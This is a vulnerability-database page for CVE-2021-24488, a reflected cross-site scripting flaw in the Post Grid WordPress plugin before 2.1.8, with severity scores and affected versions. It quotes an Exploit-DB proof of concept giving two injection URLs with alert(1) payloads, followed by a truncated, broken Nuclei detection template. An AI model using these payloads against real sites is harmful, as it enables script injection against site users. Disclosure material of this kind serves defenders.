CVE-2021-24488
published 2021-08-02CVE-2021-24488: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back…
PriorityP342medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
11.29%
95.4th percentile
The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pickplugins | post_grid | < 2.1.8 | 2.1.8 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
exploitdb·2022-02-02·CVSS 6.1
CVE-2021-24488 [MEDIUM] WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
---
# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/post-grid/
# Version: 2.1.1
# Tested on: Windows 10
# CVE: CVE-2021-24488
1. Description:
This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab=">alert(1)
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//
Nuclei
WordPress Post Grid <2.1.8 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-24488 [MEDIUM] WordPress Post Grid <2.1.8 - Cross-Site Scripting
WordPress Post Grid '
- 'Post Grid'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022043525d3262d9e4fe606d011513dc963ad740464e7c7e2dacb248370b51dc8b70022100f103c17764e84b39e31f54b159f9106e14e6ccb17f8de6dcac60dd5182ce8502:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-08-02
Published